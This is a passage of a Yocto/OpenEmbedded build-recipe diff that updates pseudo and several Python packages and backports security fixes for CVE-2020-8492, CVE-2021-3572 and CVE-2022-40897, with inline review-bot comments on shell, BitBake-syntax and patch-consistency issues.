-+ pseudo_debug(PDBGF_SERVER, "Hit max open files, dropping a client.\n");
- }
- }
- pseudo_debug(PDBGF_SERVER, "server loop complete [%d clients left]\n", active_clients);
---
-2.15.1
-
diff --git a/meta/recipes-devtools/pseudo/files/xattr_version.patch b/meta/recipes-devtools/pseudo/files/xattr_version.patch
deleted file mode 100644
index a8b14bdd69..0000000000
--- a/meta/recipes-devtools/pseudo/files/xattr_version.patch
+++ /dev/null
@@ -1,54 +0,0 @@
-On a tumbleweed system, "install X Y" was showing the error:
-
-pseudo: ENOSYS for 'fsetxattr'.
-
-which was being caused by dlsym() for that function returning NULL. This
-appears to be due to it finding an unresolved symbol in libacl for this
-symbol in libattr. It hasn't been resolved so its NULL. dlerror() returns
-nothing since this is a valid symbol entry, its just not the one we want.
-
-We can add the glibc version string for the symbol we actually want so we get
-that version rather than the libattr/libacl one.
-
-To quote libattr:
-"""
- These dumb wrappers are for backwards compatibility only.
- Actual syscall wrappers are long gone to libc.
-"""
-and they are simply wrappers around the libc version so our attaching
-to the libc versions should intercept any accesses via these too.
-
-RP 2020/06/22
-Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org
-Upstream-Status: Pending [discussed with seebs on irc and appears the correct fix]
-
-
-Index: git/ports/linux/xattr/wrapfuncs.in
-===================================================================
---- git.orig/ports/linux/xattr/wrapfuncs.in
-+++ git/ports/linux/xattr/wrapfuncs.in
-@@ -1,12 +1,12 @@
--ssize_t getxattr(const char *path, const char *name, void *value, size_t size); /* flags=0 */
--ssize_t lgetxattr(const char *path, const char *name, void *value, size_t size); /* flags=AT_SYMLINK_NOFOLLOW */
--ssize_t fgetxattr(int filedes, const char *name, void *value, size_t size);
--int setxattr(const char *path, const char *name, const void *value, size_t size, int xflags); /* flags=0 */
--int lsetxattr(const char *path, const char *name, const void *value, size_t size, int xflags); /* flags=AT_SYMLINK_NOFOLLOW */
--int fsetxattr(int filedes, const char *name, const void *value, size_t size, int xflags);
--ssize_t listxattr(const char *path, char *list, size_t size); /* flags=0 */
--ssize_t llistxattr(const char *path, char *list, size_t size); /* flags=AT_SYMLINK_NOFOLLOW */
--ssize_t flistxattr(int filedes, char *list, size_t size);
--int removexattr(const char *path, const char *name); /* flags=0 */
--int lremovexattr(const char *path, const char *name); /* flags=AT_SYMLINK_NOFOLLOW */
--int fremovexattr(int filedes, const char *name);
-+ssize_t getxattr(const char *path, const char *name, void *value, size_t size); /* flags=0, version="GLIBC_2.3" */
-+ssize_t lgetxattr(const char *path, const char *name, void *value, size_t size); /* flags=AT_SYMLINK_NOFOLLOW, version="GLIBC_2.3" */
-+ssize_t fgetxattr(int filedes, const char *name, void *value, size_t size); /* version="GLIBC_2.3" */
-+int setxattr(const char *path, const char *name, const void *value, size_t size, int xflags); /* flags=0, version="GLIBC_2.3" */
-+int lsetxattr(const char *path, const char *name, const void *value, size_t size, int xflags); /* flags=AT_SYMLINK_NOFOLLOW, version="GLIBC_2.3" */
-+int fsetxattr(int filedes, const char *name, const void *value, size_t size, int xflags); /* version="GLIBC_2.3" */
-+ssize_t listxattr(const char *path, char *list, size_t size); /* flags=0, version="GLIBC_2.3" */
-+ssize_t llistxattr(const char *path, char *list, size_t size); /* flags=AT_SYMLINK_NOFOLLOW, version="GLIBC_2.3" */
-+ssize_t flistxattr(int filedes, char *list, size_t size); /* version="GLIBC_2.3" */
-+int removexattr(const char *path, const char *name); /* flags=0, version="GLIBC_2.3" */
-+int lremovexattr(const char *path, const char *name); /* flags=AT_SYMLINK_NOFOLLOW, version="GLIBC_2.3" */
-+int fremovexattr(int filedes, const char *name); /* version="GLIBC_2.3" */
diff --git a/meta/recipes-devtools/pseudo/pseudo.inc b/meta/recipes-devtools/pseudo/pseudo.inc
index 50e30064bd..e6512bc6e6 100644
--- a/meta/recipes-devtools/pseudo/pseudo.inc
+++ b/meta/recipes-devtools/pseudo/pseudo.inc
@@ -4,6 +4,7 @@
SUMMARY = "Pseudo gives fake root capabilities to a normal user"
HOMEPAGE = "http://git.yoctoproject.org/cgit/cgit.cgi/pseudo"
+DESCRIPTION = "The pseudo utility offers a way to run commands in a virtualized root environment."
LIC_FILES_CHKSUM = "file://COPYING;md5=a1d8023a6f953ac6ea4af765ff62d574"
SECTION = "base"
LICENSE = "LGPL2.1"
@@ -111,6 +112,19 @@ do_compile_prepend_class-nativesdk () {
fi
}
+do_compile_append_class-native () {
+ if [ '${@bb.data.inherits_class('uninative', d)}' = 'True' ]; then
+ for i in PSEUDO_PORT_UNIX_SYNCFS PSEUDO_PORT_UIDS_GENERIC PSEUDO_PORT_LINUX_NEWCLONE PSEUDO_PORT_LINUX_XATTR PSEUDO_PORT_LINUX_STATVFS; do
+ grep $i.1 ${S}/pseudo_ports.h
+ if [ $? != 0 ]; then
+ echo "$i not enabled in pseudo which is incompatible with uninative"
+ exit 1
+ fi
+ done
+ fi
+}
+
+
do_install () {
oe_runmake 'DESTDIR=${D}' ${MAKEOPTS} 'LIB=lib/pseudo/lib$(MARK64)' install
}
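Review bot: In `do_compile_append_class-native` the bare `grep $i.1 ${S}/pseudo_ports.h` is followed by a separate `if [ $? != 0 ]` test. BitBake normally runs shell tasks under `set -e`, so a failing `grep` would abort the task before the `echo` explaining the uninative incompatibility is reached. Folding the test into the condition keeps the diagnostic and stops matched lines being dumped into the log: `if ! grep -q "$i.1" ${S}/pseudo_ports.h; then`. Using `bbfatal "$i not enabled in pseudo which is incompatible with uninative"` in place of the `echo`/`exit 1` pair would also surface the message as a proper task error.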
diff --git a/meta/recipes-devtools/pseudo/pseudo_git.bb b/meta/recipes-devtools/pseudo/pseudo_git.bb
index 419bac19fe..b5da3f0e29 100644
--- a/meta/recipes-devtools/pseudo/pseudo_git.bb
+++ b/meta/recipes-devtools/pseudo/pseudo_git.bb
@@ -1,22 +1,19 @@
require pseudo.inc
-SRC_URI = "git://git.yoctoproject.org/pseudo \
+SRC_URI = "git://git.yoctoproject.org/pseudo;branch=oe-core \
file://0001-configure-Prune-PIE-flags.patch \
file://fallback-passwd \
file://fallback-group \
- file://moreretries.patch \
- file://toomanyfiles.patch \
- file://0001-maketables-wrappers-use-Python-3.patch \
- file://0001-Add-statx.patch \
- file://0001-realpath.c-Remove-trailing-slashes.patch \
- file://0006-xattr-adjust-for-attr-2.4.48-release.patch \
- file://seccomp.patch \
- file://0001-pseudo-On-a-DB-fixup-remove-files-that-do-not-exist-.patch \
- file://0001-pseudo_ipc.h-Fix-enum-typedef.patch \
- file://xattr_version.patch \
"
+SRC_URI:append:class-native = " \
+ http://downloads.yoctoproject.org/mirror/sources/pseudo-prebuilt-2.33.tar.xz;subdir=git/prebuilt;name=prebuilt \
+ file://older-glibc-symbols.patch"
+SRC_URI:append:class-nativesdk = " \
+ http://downloads.yoctoproject.org/mirror/sources/pseudo-prebuilt-2.33.tar.xz;subdir=git/prebuilt;name=prebuilt \
+ file://older-glibc-symbols.patch"
+SRC_URI[prebuilt.sha256sum] = "ed9f456856e9d86359f169f46a70ad7be4190d6040282b84c8d97b99072485aa"
-SRCREV = "060058bb29f70b244e685b3c704eb0641b736f73"
+SRCREV = "2b4b88eb513335b0ece55fe51854693d9b20de35"
S = "${WORKDIR}/git"
PV = "1.9.0+git${SRCPV}"
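Review bot: The two new `SRC_URI:append:class-native` / `SRC_URI:append:class-nativesdk` assignments use the colon override syntax, while the rest of this diff uses the underscore form (`SRC_URI_append_class-native` in the perl recipe, `do_compile_append_class-native` in pseudo.inc). If the BitBake on this branch does not treat `:append:` as an override, the prebuilt tarball and `older-glibc-symbols.patch` would silently not be applied. Please confirm that, or write them as `SRC_URI_append_class-native = " \` and `SRC_URI_append_class-nativesdk = " \` to match. The two blocks are also identical, so a shared variable holding both entries would keep them from drifting apart.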
diff --git a/meta/recipes-devtools/python-numpy/python-numpy.inc b/meta/recipes-devtools/python-numpy/python-numpy.inc
index 42032a04a8..4cc506474b 100644
--- a/meta/recipes-devtools/python-numpy/python-numpy.inc
+++ b/meta/recipes-devtools/python-numpy/python-numpy.inc
@@ -1,4 +1,6 @@
SUMMARY = "A sophisticated Numeric Processing Package for Python"
+HOMEPAGE = "https://numpy.org/"
+DESCRIPTION = "NumPy is the fundamental package needed for scientific computing with Python."
SECTION = "devel/python"
LICENSE = "BSD-3-Clause & BSD-2-Clause & PSF & Apache-2.0 & BSD & MIT"
LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=1a32aba007a415aa8a1c708a0e2b86a1"
diff --git a/meta/recipes-devtools/python/files/0001-bpo-39503-CVE-2020-8492-Fix-AbstractBasicAuthHandler.patch b/meta/recipes-devtools/python/files/0001-bpo-39503-CVE-2020-8492-Fix-AbstractBasicAuthHandler.patch
deleted file mode 100644
index e16b99bcb9..0000000000
--- a/meta/recipes-devtools/python/files/0001-bpo-39503-CVE-2020-8492-Fix-AbstractBasicAuthHandler.patch
+++ /dev/null
@@ -1,248 +0,0 @@
-From 0b297d4ff1c0e4480ad33acae793fbaf4bf015b4 Mon Sep 17 00:00:00 2001
-From: Victor Stinner <vstinner@python.org>
-Date: Thu, 2 Apr 2020 02:52:20 +0200
-Subject: [PATCH] bpo-39503: CVE-2020-8492: Fix AbstractBasicAuthHandler
- (GH-18284)
-
-Upstream-Status: Backport
-(https://github.com/python/cpython/commit/0b297d4ff1c0e4480ad33acae793fbaf4bf015b4)
-
-CVE: CVE-2020-8492
-
-The AbstractBasicAuthHandler class of the urllib.request module uses
-an inefficient regular expression which can be exploited by an
-attacker to cause a denial of service. Fix the regex to prevent the
-catastrophic backtracking. Vulnerability reported by Ben Caller
-and Matt Schwager.
-
-AbstractBasicAuthHandler of urllib.request now parses all
-WWW-Authenticate HTTP headers and accepts multiple challenges per
-header: use the realm of the first Basic challenge.
-
-Co-Authored-By: Serhiy Storchaka <storchaka@gmail.com>
-Signed-off-by: Trevor Gamblin <trevor.gamblin@windriver.com>
----
- Lib/test/test_urllib2.py | 90 ++++++++++++-------
- Lib/urllib/request.py | 69 ++++++++++----
- .../2020-03-25-16-02-16.bpo-39503.YmMbYn.rst | 3 +
- .../2020-01-30-16-15-29.bpo-39503.B299Yq.rst | 5 ++
- 4 files changed, 115 insertions(+), 52 deletions(-)
- create mode 100644 Misc/NEWS.d/next/Library/2020-03-25-16-02-16.bpo-39503.YmMbYn.rst
- create mode 100644 Misc/NEWS.d/next/Security/2020-01-30-16-15-29.bpo-39503.B299Yq.rst
-
-diff --git a/Lib/test/test_urllib2.py b/Lib/test/test_urllib2.py
-index 8abedaac98..e69ac3e213 100644
---- a/Lib/test/test_urllib2.py
-+++ b/Lib/test/test_urllib2.py
-@@ -1446,40 +1446,64 @@ class HandlerTests(unittest.TestCase):
- bypass = {'exclude_simple': True, 'exceptions': []}
- self.assertTrue(_proxy_bypass_macosx_sysconf('test', bypass))
-
-- def test_basic_auth(self, quote_char='"'):
-- opener = OpenerDirector()
-- password_manager = MockPasswordManager()
-- auth_handler = urllib.request.HTTPBasicAuthHandler(password_manager)
-- realm = "ACME Widget Store"
-- http_handler = MockHTTPHandler(
-- 401, 'WWW-Authenticate: Basic realm=%s%s%s\r\n\r\n' %
-- (quote_char, realm, quote_char))
-- opener.add_handler(auth_handler)
-- opener.add_handler(http_handler)
-- self._test_basic_auth(opener, auth_handler, "Authorization",
-- realm, http_handler, password_manager,
-- "http://acme.example.com/protected",
-- "http://acme.example.com/protected",
-- )
--
-- def test_basic_auth_with_single_quoted_realm(self):
-- self.test_basic_auth(quote_char="'")
--
-- def test_basic_auth_with_unquoted_realm(self):
-- opener = OpenerDirector()
-- password_manager = MockPasswordManager()
-- auth_handler = urllib.request.HTTPBasicAuthHandler(password_manager)
-- realm = "ACME Widget Store"
-- http_handler = MockHTTPHandler(
-- 401, 'WWW-Authenticate: Basic realm=%s\r\n\r\n' % realm)
-- opener.add_handler(auth_handler)
-- opener.add_handler(http_handler)
-- with self.assertWarns(UserWarning):
-+ def check_basic_auth(self, headers, realm):
-+ with self.subTest(realm=realm, headers=headers):
-+ opener = OpenerDirector()
-+ password_manager = MockPasswordManager()
-+ auth_handler = urllib.request.HTTPBasicAuthHandler(password_manager)
-+ body = '\r\n'.join(headers) + '\r\n\r\n'
-+ http_handler = MockHTTPHandler(401, body)
-+ opener.add_handler(auth_handler)
-+ opener.add_handler(http_handler)
- self._test_basic_auth(opener, auth_handler, "Authorization",
-- realm, http_handler, password_manager,
-- "http://acme.example.com/protected",
-- "http://acme.example.com/protected",
-- )
-+ realm, http_handler, password_manager,
-+ "http://acme.example.com/protected",
-+ "http://acme.example.com/protected")
-+
-+ def test_basic_auth(self):
-+ realm = "realm2@example.com"
-+ realm2 = "realm2@example.com"
-+ basic = f'Basic realm="{realm}"'
-+ basic2 = f'Basic realm="{realm2}"'
-+ other_no_realm = 'Otherscheme xxx'
-+ digest = (f'Digest realm="{realm2}", '
-+ f'qop="auth, auth-int", '
-+ f'nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", '
-+ f'opaque="5ccc069c403ebaf9f0171e9517f40e41"')
-+ for realm_str in (
-+ # test "quote" and 'quote'
-+ f'Basic realm="{realm}"',
-+ f"Basic realm='{realm}'",
-+
-+ # charset is ignored
-+ f'Basic realm="{realm}", charset="UTF-8"',
-+
-+ # Multiple challenges per header
-+ f'{basic}, {basic2}',
-+ f'{basic}, {other_no_realm}',
-+ f'{other_no_realm}, {basic}',
-+ f'{basic}, {digest}',
-+ f'{digest}, {basic}',
-+ ):
-+ headers = [f'WWW-Authenticate: {realm_str}']
-+ self.check_basic_auth(headers, realm)
-+
-+ # no quote: expect a warning
-+ with support.check_warnings(("Basic Auth Realm was unquoted",
-+ UserWarning)):
-+ headers = [f'WWW-Authenticate: Basic realm={realm}']
-+ self.check_basic_auth(headers, realm)
-+
-+ # Multiple headers: one challenge per header.
-+ # Use the first Basic realm.
-+ for challenges in (
-+ [basic, basic2],
-+ [basic, digest],
-+ [digest, basic],
-+ ):
-+ headers = [f'WWW-Authenticate: {challenge}'
-+ for challenge in challenges]
-+ self.check_basic_auth(headers, realm)
-
- def test_proxy_basic_auth(self):
- opener = OpenerDirector()
-diff --git a/Lib/urllib/request.py b/Lib/urllib/request.py
-index 7fe50535da..2a3d71554f 100644
---- a/Lib/urllib/request.py
-+++ b/Lib/urllib/request.py
-@@ -937,8 +937,15 @@ class AbstractBasicAuthHandler:
-
- # allow for double- and single-quoted realm values
- # (single quotes are a violation of the RFC, but appear in the wild)
-- rx = re.compile('(?:.*,)*[ \t]*([^ \t]+)[ \t]+'
-- 'realm=(["\']?)([^"\']*)\\2', re.I)
-+ rx = re.compile('(?:^|,)' # start of the string or ','
-+ '[ \t]*' # optional whitespaces
-+ '([^ \t]+)' # scheme like "Basic"
-+ '[ \t]+' # mandatory whitespaces
-+ # realm=xxx
-+ # realm='xxx'
-+ # realm="xxx"
-+ 'realm=(["\']?)([^"\']*)\\2',
-+ re.I)
-
- # XXX could pre-emptively send auth info already accepted (RFC 2617,
- # end of section 2, and section 1.2 immediately after "credentials"
-@@ -950,27 +957,51 @@ class AbstractBasicAuthHandler:
- self.passwd = password_mgr
- self.add_password = self.passwd.add_password
-
-+ def _parse_realm(self, header):
-+ # parse WWW-Authenticate header: accept multiple challenges per header
-+ found_challenge = False
-+ for mo in AbstractBasicAuthHandler.rx.finditer(header):
-+ scheme, quote, realm = mo.groups()
-+ if quote not in ['"', "'"]:
-+ warnings.warn("Basic Auth Realm was unquoted",
-+ UserWarning, 3)
-+
-+ yield (scheme, realm)
-+
-+ found_challenge = True
-+
-+ if not found_challenge:
-+ if header:
-+ scheme = header.split()[0]
-+ else:
-+ scheme = ''
-+ yield (scheme, None)
-+
- def http_error_auth_reqed(self, authreq, host, req, headers):
- # host may be an authority (without userinfo) or a URL with an
- # authority
-- # XXX could be multiple headers
-- authreq = headers.get(authreq, None)
-+ headers = headers.get_all(authreq)
-+ if not headers:
-+ # no header found
-+ return
-
-- if authreq:
-- scheme = authreq.split()[0]
-- if scheme.lower() != 'basic':
-- raise ValueError("AbstractBasicAuthHandler does not"
-- " support the following scheme: '%s'" %
-- scheme)
-- else:
-- mo = AbstractBasicAuthHandler.rx.search(authreq)
-- if mo:
-- scheme, quote, realm = mo.groups()
-- if quote not in ['"',"'"]:
-- warnings.warn("Basic Auth Realm was unquoted",
-- UserWarning, 2)
-- if scheme.lower() == 'basic':
-- return self.retry_http_basic_auth(host, req, realm)
-+ unsupported = None
-+ for header in headers:
-+ for scheme, realm in self._parse_realm(header):
-+ if scheme.lower() != 'basic':
-+ unsupported = scheme
-+ continue
-+
-+ if realm is not None:
-+ # Use the first matching Basic challenge.
-+ # Ignore following challenges even if they use the Basic
-+ # scheme.
-+ return self.retry_http_basic_auth(host, req, realm)
-+
-+ if unsupported is not None:
-+ raise ValueError("AbstractBasicAuthHandler does not "
-+ "support the following scheme: %r"
-+ % (scheme,))
-
- def retry_http_basic_auth(self, host, req, realm):
- user, pw = self.passwd.find_user_password(realm, host)
-diff --git a/Misc/NEWS.d/next/Library/2020-03-25-16-02-16.bpo-39503.YmMbYn.rst b/Misc/NEWS.d/next/Library/2020-03-25-16-02-16.bpo-39503.YmMbYn.rst
-new file mode 100644
-index 0000000000..be80ce79d9
---- /dev/null
-+++ b/Misc/NEWS.d/next/Library/2020-03-25-16-02-16.bpo-39503.YmMbYn.rst
-@@ -0,0 +1,3 @@
-+:class:`~urllib.request.AbstractBasicAuthHandler` of :mod:`urllib.request`
-+now parses all WWW-Authenticate HTTP headers and accepts multiple challenges
-+per header: use the realm of the first Basic challenge.
-diff --git a/Misc/NEWS.d/next/Security/2020-01-30-16-15-29.bpo-39503.B299Yq.rst b/Misc/NEWS.d/next/Security/2020-01-30-16-15-29.bpo-39503.B299Yq.rst
-new file mode 100644
-index 0000000000..9f2800581c
---- /dev/null
-+++ b/Misc/NEWS.d/next/Security/2020-01-30-16-15-29.bpo-39503.B299Yq.rst
-@@ -0,0 +1,5 @@
-+CVE-2020-8492: The :class:`~urllib.request.AbstractBasicAuthHandler` class of the
-+:mod:`urllib.request` module uses an inefficient regular expression which can
-+be exploited by an attacker to cause a denial of service. Fix the regex to
-+prevent the catastrophic backtracking. Vulnerability reported by Ben Caller
-+and Matt Schwager.
---
-2.24.1
-
diff --git a/meta/recipes-devtools/python/python-setuptools.inc b/meta/recipes-devtools/python/python-setuptools.inc
index 29be852f66..5faf62bc3a 100644
--- a/meta/recipes-devtools/python/python-setuptools.inc
+++ b/meta/recipes-devtools/python/python-setuptools.inc
@@ -8,6 +8,8 @@ PYPI_PACKAGE_EXT = "zip"
inherit pypi
+SRC_URI += " file://CVE-2022-40897.patch "
+
SRC_URI_append_class-native = " file://0001-conditionally-do-not-fetch-code-by-easy_install.patch"
SRC_URI[md5sum] = "0c956eea142af9c2b02d72e3c042af30"
diff --git a/meta/recipes-devtools/python/python3-jinja2_2.11.2.bb b/meta/recipes-devtools/python/python3-jinja2_2.11.3.bb
index 89538d2f27..9f054c6024 100644
--- a/meta/recipes-devtools/python/python3-jinja2_2.11.2.bb
+++ b/meta/recipes-devtools/python/python3-jinja2_2.11.3.bb
@@ -1,12 +1,15 @@
DESCRIPTION = "Python Jinja2: A small but fast and easy to use stand-alone template engine written in pure python."
+HOMEPAGE = "https://pypi.org/project/Jinja2/"
LICENSE = "BSD-3-Clause"
LIC_FILES_CHKSUM = "file://LICENSE.rst;md5=5dc88300786f1c214c1e9827a5229462"
-SRC_URI[sha256sum] = "89aab215427ef59c34ad58735269eb58b1a5808103067f7bb9d5836c651b3bb0"
+SRC_URI[sha256sum] = "a6d58433de0ae800347cab1fa3043cebbabe8baa9d29e668f1c768cb87a333c6"
PYPI_PACKAGE = "Jinja2"
+CVE_PRODUCT = "jinja2 jinja"
+
CLEANBROKEN = "1"
inherit pypi setuptools3
diff --git a/meta/recipes-devtools/python/python3-magic_0.4.15.bb b/meta/recipes-devtools/python/python3-magic_0.4.15.bb
index 698016ba4c..b73310c808 100644
--- a/meta/recipes-devtools/python/python3-magic_0.4.15.bb
+++ b/meta/recipes-devtools/python/python3-magic_0.4.15.bb
@@ -14,6 +14,11 @@ inherit pypi setuptools3
SRC_URI[md5sum] = "e384c95a47218f66c6501cd6dd45ff59"
SRC_URI[sha256sum] = "f3765c0f582d2dfc72c15f3b5a82aecfae9498bd29ca840d72f37d7bd38bfcd5"
-RDEPENDS_${PN} += "file"
+DEPENDS_append_class-native = " file-replacement-native"
+
+RDEPENDS_${PN} += "file \
+ ${PYTHON_PN}-ctypes \
+ ${PYTHON_PN}-io \
+ ${PYTHON_PN}-shell"
BBCLASSEXTEND = "native"
diff --git a/meta/recipes-devtools/python/python3-pip/CVE-2021-3572.patch b/meta/recipes-devtools/python/python3-pip/CVE-2021-3572.patch
new file mode 100644
index 0000000000..a38ab57bc6
--- /dev/null
+++ b/meta/recipes-devtools/python/python3-pip/CVE-2021-3572.patch
@@ -0,0 +1,48 @@
+From c4fd13410b9a219f77fc30775d4a0ac9f69725bd Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 16 Jun 2022 09:52:43 +0530
+Subject: [PATCH] CVE-2021-3572
+
+Upstream-Status: Backport [https://github.com/pypa/pip/commit/e46bdda9711392fec0c45c1175bae6db847cb30b]
+CVE: CVE-2021-3572
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ news/9827.bugfix.rst | 3 +++
+ src/pip/_internal/vcs/git.py | 10 ++++++++--
+ 2 files changed, 11 insertions(+), 2 deletions(-)
+ create mode 100644 news/9827.bugfix.rst
+
+diff --git a/news/9827.bugfix.rst b/news/9827.bugfix.rst
+new file mode 100644
+index 0000000..e0d27c3
+--- /dev/null
++++ b/news/9827.bugfix.rst
+@@ -0,0 +1,3 @@
++**SECURITY**: Stop splitting on unicode separators in git references,
++which could be maliciously used to install a different revision on the
++repository.
+diff --git a/src/pip/_internal/vcs/git.py b/src/pip/_internal/vcs/git.py
+index 7483303..1b895f6 100644
+--- a/src/pip/_internal/vcs/git.py
++++ b/src/pip/_internal/vcs/git.py
+@@ -137,9 +137,15 @@ class Git(VersionControl):
+ output = cls.run_command(['show-ref', rev], cwd=dest,
+ show_stdout=False, on_returncode='ignore')
+ refs = {}
+- for line in output.strip().splitlines():
++ # NOTE: We do not use splitlines here since that would split on other
++ # unicode separators, which can be maliciously used to install a
++ # different revision.
++ for line in output.strip().split("\n"):
++ line = line.rstrip("\r")
++ if not line:
++ continue
+ try:
+- sha, ref = line.split()
++ ref_sha, ref_name = line.split(" ", maxsplit=2)
+ except ValueError:
+ # Include the offending line to simplify troubleshooting if
+ # this error ever occurs.
+--
+2.25.1
+
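Review bot: The backported hunk for `src/pip/_internal/vcs/git.py` renames the unpacked values to `ref_sha, ref_name`, but it stops at the comment under `except ValueError:`, so the statement that stores the pair into `refs` lies outside the patch and is not updated. If that statement still reads the old `sha` and `ref` names, as the removed line `sha, ref = line.split()` suggests, the loop would raise a NameError on the first line that `show-ref` returns. Either keep the original names in the backport, `sha, ref = line.split(" ", maxsplit=2)`, or extend the hunk so the consumer uses `ref_sha` and `ref_name`. The enclosing method starts and ends outside the hunk, so this should be confirmed against the pip 20.0.2 source the patch is applied to.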
diff --git a/meta/recipes-devtools/python/python3-pip_20.0.2.bb b/meta/recipes-devtools/python/python3-pip_20.0.2.bb
index 08738fb2f9..e24c6f4477 100644
--- a/meta/recipes-devtools/python/python3-pip_20.0.2.bb
+++ b/meta/recipes-devtools/python/python3-pip_20.0.2.bb
@@ -6,6 +6,7 @@ LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=8ba06d529c955048e5ddd7c45459eb2e"
DEPENDS += "python3 python3-setuptools-native"
+SRC_URI = "file://CVE-2021-3572.patch "
SRC_URI[md5sum] = "7d42ba49b809604f0df3d55df1c3fd86"
SRC_URI[sha256sum] = "7db0c8ea4c7ea51c8049640e8e6e7fde949de672bfa4949920675563a5a6967f"
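Review bot: `SRC_URI = "file://CVE-2021-3572.patch "` is a plain assignment, whereas the matching setuptools change in this commit uses `SRC_URI += " file://CVE-2022-40897.patch "`. The pip source archive is then fetched only if the recipe's `inherit` line, which is outside this hunk, comes after the assignment and the class appends the PyPI URL (presumably it does; verify against pypi.bbclass). If that ordering ever changes, the recipe would fetch just the patch and the `SRC_URI[sha256sum]` below would check nothing. Writing `SRC_URI += "file://CVE-2021-3572.patch"` removes the dependency on statement order.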
diff --git a/meta/recipes-devtools/python/python3-pycairo_1.19.0.bb b/meta/recipes-devtools/python/python3-pycairo_1.19.0.bb
index 8f60834c17..8452d7fa9f 100644
--- a/meta/recipes-devtools/python/python3-pycairo_1.19.0.bb
+++ b/meta/recipes-devtools/python/python3-pycairo_1.19.0.bb
@@ -18,7 +18,7 @@ SRC_URI[sha256sum] = "4f5ba9374a46c98729dd3727d993f5e17ed0286fd6738ed464fe4efa06
S = "${WORKDIR}/pycairo-${PV}"
-inherit meson pkgconfig
+inherit meson pkgconfig python3targetconfig
CFLAGS += "-fPIC"
diff --git a/meta/recipes-devtools/python/python3-pygobject_3.34.0.bb b/meta/recipes-devtools/python/python3-pygobject_3.34.0.bb
index 6babf0cae8..29825492b9 100644
--- a/meta/recipes-devtools/python/python3-pygobject_3.34.0.bb
+++ b/meta/recipes-devtools/python/python3-pygobject_3.34.0.bb
@@ -1,4 +1,6 @@
SUMMARY = "Python GObject bindings"
+HOMEPAGE = "https://gitlab.gnome.org/GNOME/pygobject"
+DESCRIPTION = "PyGObject is a Python package which provides bindings for GObject based libraries such as GTK, GStreamer, WebKitGTK, GLib, GIO and many more."
SECTION = "devel/python"
LICENSE = "LGPLv2.1"
LIC_FILES_CHKSUM = "file://COPYING;md5=a916467b91076e631dd8edb7424769c7"
diff --git a/meta/recipes-devtools/python/python3-scons_3.1.2.bb b/meta/recipes-devtools/python/python3-scons_3.1.2.bb
index ce117a92d4..12122131a5 100644
--- a/meta/recipes-devtools/python/python3-scons_3.1.2.bb
+++ b/meta/recipes-devtools/python/python3-scons_3.1.2.bb
@@ -1,4 +1,5 @@
SUMMARY = "Software Construction tool (make/autotools replacement)"
+HOMEPAGE = "https://github.com/SCons/scons"
SECTION = "devel/python"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://${WORKDIR}/LICENSE-python3-scons-${PV};md5=e14e1b33428df24a40a782ae142785d0"
diff --git a/meta/recipes-devtools/python/python3-setuptools/CVE-2022-40897.patch b/meta/recipes-devtools/python/python3-setuptools/CVE-2022-40897.patch
new file mode 100644
index 0000000000..9150cea07e
--- /dev/null
+++ b/meta/recipes-devtools/python/python3-setuptools/CVE-2022-40897.patch
@@ -0,0 +1,29 @@
+From 43a9c9bfa6aa626ec2a22540bea28d2ca77964be Mon Sep 17 00:00:00 2001
+From: "Jason R. Coombs" <jaraco@jaraco.com>
+Date: Fri, 4 Nov 2022 13:47:53 -0400
+Subject: [PATCH] Limit the amount of whitespace to search/backtrack. Fixes
+ #3659.
+
+CVE: CVE-2022-40897
+Upstream-Status: Backport [
+Upstream : https://github.com/pypa/setuptools/commit/43a9c9bfa6aa626ec2a22540bea28d2ca77964be
+Import from Ubuntu: http://archive.ubuntu.com/ubuntu/pool/main/s/setuptools/setuptools_45.2.0-1ubuntu0.1.debian.tar.xz
+]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+---
+ setuptools/package_index.py | 2 +-
+ setuptools/tests/test_packageindex.py | 1 -
+ 2 files changed, 1 insertion(+), 2 deletions(-)
+
+--- setuptools-45.2.0.orig/setuptools/package_index.py
++++ setuptools-45.2.0/setuptools/package_index.py
+@@ -215,7 +215,7 @@ def unique_values(func):
+ return wrapper
+
+
+-REL = re.compile(r"""<([^>]*\srel\s*=\s*['"]?([^'">]+)[^>]*)>""", re.I)
++REL = re.compile(r"""<([^>]*\srel\s{0,10}=\s{0,10}['"]?([^'" >]+)[^>]*)>""", re.I)
+ # this line is here to fix emacs' cruddy broken syntax highlighting
+
+
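Review bot: The patch header's diffstat lists `setuptools/tests/test_packageindex.py | 1 -` and "2 files changed, 1 insertion(+), 2 deletions(-)", but the body carries only the `package_index.py` hunk, so the header does not describe what is applied. Regenerate the diffstat, or restore the test hunk if it was dropped while importing from the Ubuntu tarball. The description should also say that the new `REL` pattern bounds each whitespace run with `\s{0,10}` and stops the captured value at a space (`[^'" >]+`). That changes which `rel` attributes match, and no test for it is carried in the patch.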
diff --git a/meta/recipes-devtools/python/python3/0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch b/meta/recipes-devtools/python/python3/0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch
index c4fae09a5b..4ac0e140cc 100644
--- a/meta/recipes-devtools/python/python3/0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch
+++ b/meta/recipes-devtools/python/python3/0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch
@@ -14,17 +14,21 @@ Upstream-Status: Submitted [https://github.com/python/cpython/pull/13196]
Signed-off-by: Matthias Schoepfer <matthias.schoepfer@ithinx.io>
%% original patch: 0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch
+
+Updated to apply after dea270a2a80214de22afadaaca2043d0d782eb7d
+
+Signed-off-by: Tim Orling <tim.orling@konsulko.com>
---
configure.ac | 175 +++++++--------------------------------------------
1 file changed, 21 insertions(+), 154 deletions(-)
diff --git a/configure.ac b/configure.ac
-index ede710e..bc81b0b 100644
+index de83332dd3..16b02d0798 100644
--- a/configure.ac
+++ b/configure.ac
-@@ -710,160 +710,27 @@ fi
- MULTIARCH=$($CC --print-multiarch 2>/dev/null)
- AC_SUBST(MULTIARCH)
+@@ -719,160 +719,27 @@ then
+ fi
+
-AC_MSG_CHECKING([for the platform triplet based on compiler characteristics])
-cat >> conftest.c <<EOF
